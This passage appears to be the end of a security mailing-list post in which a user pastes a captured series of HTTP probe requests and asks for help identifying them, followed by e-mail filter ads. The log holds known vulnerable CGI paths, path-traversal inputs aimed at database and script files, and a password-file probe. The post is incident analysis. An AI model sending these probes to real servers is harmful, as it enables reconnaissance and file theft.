/cgi-bin/processit.pl HTTP/1.0\x0a\x0a HEAD /PSUser/PSCOErrPage.htm
HTTP/1.0\x0a\x0a HEAD /pservlet.html HTTP/1.0\x0a\x0a HEAD
/cgi-bin/ipf/etc/gfw/ui/pwd.dat HTTP/1.0\x0a\x0a HEAD
/Newuser?Image=../../database/rbsserv.mdb HTTP/1.0\x0a\x0a HEAD
/cgi-bin/redirect.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/register.cgi
HTTP/1.0\x0a\x0a HEAD /cgi-bin/responder.cgi HTTP/1.0\x0a\x0a HEAD
/cgi-bin/rpm_query HTTP/1.0\x0a\x0a HEAD /cgi-bin/rwwwshell.pl
HTTP/1.0\x0a\x0a HEAD /sawmill HTTP/1.0\x0a\x0a HEAD /scancfg.cgi
HTTP/1.0\x0a\x0a HEAD /cgi-bin/search.cgi?letter= HTTP/1.0\x0a\x0a HEAD
/cgi-bin/Search.pl HTTP/1.0\x0a\x0a HEAD /ROADS/cgi-bin/search.pl
HTTP/1.0\x0a\x0a HEAD /inc/sendmail.inc HTTP/1.0\x0a\x0a HEAD /setpasswd.cgi
HTTP/1.0\x0a\x0a HEAD /cgi-bin/simplestguest.cgi HTTP/1.0\x0a\x0a HEAD
/cgi-bin/simplestmail.cgi HTTP/1.0\x0a\x0a HEAD
/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi HTTP/1.0\x0a\x0a HEAD
/html/snort2html.html HTTP/1.0\x0a\x0a HEAD /snort2html.html
HTTP/1.0\x0a\x0a HEAD /site/eg/source.asp HTTP/1.0\x0a\x0a HEAD
/secret/secret/sql_tool.shtml HTTP/1.0\x0a\x0a HEAD
/cd-cgi/sscd_suncourier.pl HTTP/1.0\x0a\x0a HEAD /stat.htm HTTP/1.0\x0a\x0a
HEAD /stats.htm HTTP/1.0\x0a\x0a HEAD /stats.html HTTP/1.0\x0a\x0a HEAD
/stats.txt HTTP/1.0\x0a\x0a HEAD /scripts/submit.cgi HTTP/1.0\x0a\x0a HEAD
/users/scripts/submit.cgi HTTP/1.0\x0a\x0a HEAD /submit.php?CONF=anything
HTTP/1.0\x0a\x0a HEAD /cgi-bin/subscribe.pl HTTP/1.0\x0a\x0a HEAD
/subscribe.pl?testtest.com HTTP/1.0\x0a\x0a HEAD /survey HTTP/1.0\x0a\x0a
HEAD /cgi-bin/survey.cgi HTTP/1.0\x0a\x0a HEAD /technote/main.cgi/oops?
board=FREE_BOARD&command=down_load&filename=/../../../main.cgi HTTP/1.0
\x0a\x0a HEAD /technote/print.cgi HTTP/1.0\x0a\x0a HEAD /test/test.cgi
HTTP/1.0\x0a\x0a HEAD /cgi-bin/test-cgi HTTP/1.0\x0a\x0a HEAD
/cgi-bin/textcounter.pl HTTP/1.0\x0a\x0a HEAD
/cgi-bin/search/tidfinder.cgi?2956734 HTTP/1.0\x0a\x0a HEAD
/cgi-bin/ultraboard.cgi HTTP/1.0\x0a\x0a HEAD /ultraboard.pl
HTTP/1.0\x0a\x0a HEAD /cgi-bin/unlg1.1 HTTP/1.0\x0a\x0a HEAD
/cgi-bin/unlg1.2 HTTP/1.0\x0a\x0a HEAD /cgi-bin/upload_file.pl
HTTP/1.0\x0a\x0a HEAD /user.php&op=saveuser HTTP/1.0\x0a\x0a HEAD
/cgi-auth/userreg.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/ustorekeeper.pl
HTTP/1.0\x0a\x0a HEAD /cgi-bin/view_page.html HTTP/1.0\x0a\x0a HEAD
/cgi-bin/view-source HTTP/1.0\x0a\x0a HEAD /search97cgi/vtopic
HTTP/1.0\x0a\x0a HEAD /cgi-bin/w3-msql HTTP/1.0\x0a\x0a HEAD
/cgi-bin/wais.pl HTTP/1.0\x0a\x0a HEAD /way-board/way-board.cgi
HTTP/1.0\x0a\x0a HEAD /webaccess.htm HTTP/1.0\x0a\x0a HEAD
/cgi-bin/webdata.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/webdist.cgi
HTTP/1.0\x0a\x0a HEAD /cgi-bin/webdriver HTTP/1.0\x0a\x0a HEAD
/cgi-bin/webgais HTTP/1.0\x0a\x0a HEAD //WEB-INF/ HTTP/1.0\x0a\x0a HEAD
/cgi-bin/replicator/webpage.cgi HTTP/1.0\x0a\x0a HEAD
/cgi-bin/webplus.cgi?Script=/webplus/webping/webping.wml HTTP/1.0 \x0a\x0a
HEAD /cgi-bin/websendmail HTTP/1.0\x0a\x0a HEAD /cgi-bin/webspirs.cgi
HTTP/1.0\x0a\x0a HEAD /cgi-bin/webwho.pl HTTP/1.0\x0a\x0a HEAD
/cgi-bin/scripts/whois.cgi?action=load&whois=check HTTP/1.0\x0a\x0a HEAD
/cgi-bin/whois_raw.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/wrap.cgi
HTTP/1.0\x0a\x0a HEAD /WSFTP.LOG HTTP/1.0\x0a\x0a HEAD /cgi-bin/wwwboard.pl
HTTP/1.0\x0a\x0a HEAD /cgi-bin/www-sql HTTP/1.0\x0a\x0a OPTIONS /
HTTP/1.1\x0d\x0atranslate: f\x0d\x0aUser-Agent: Microsoft-
WebDAV-MiniRedir/5.1.2600\x0d\x0aHost: 159.37.8.1\x0d\x0aContent-Length: 0
\x0d\x0aConnection: Keep-Alive\x0d\x0a\x0d\x0a SEARCH /
HTTP/1.0\x0d\x0a\x0d\x0a Thanks for any leads, Dean
----------------------------------------------------------------------------
Powerful Anti-Spam Management and More...
SurfControl E-mail Filter puts the brakes on spam,
viruses and malicious code. Safeguard your business
critical communications. Download a free 30-day trial:
http://www.securityfocus.com/SurfControl-incidents

<b>
----------------------------------------------------------------------------
Is SPAM over-loading your e-mail server, disk space or bandwidth?
SurfControl E-Mail Filter is flexible, intelligent and policy-driven
protection.
http://www.securityfocus.com/SurfControl-incidents2
Download your free fully functional
trial, complete with 30-days of free technical support.
Stop SPAM before it stops you.
----------------------------------------------------------------------------
</b>

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]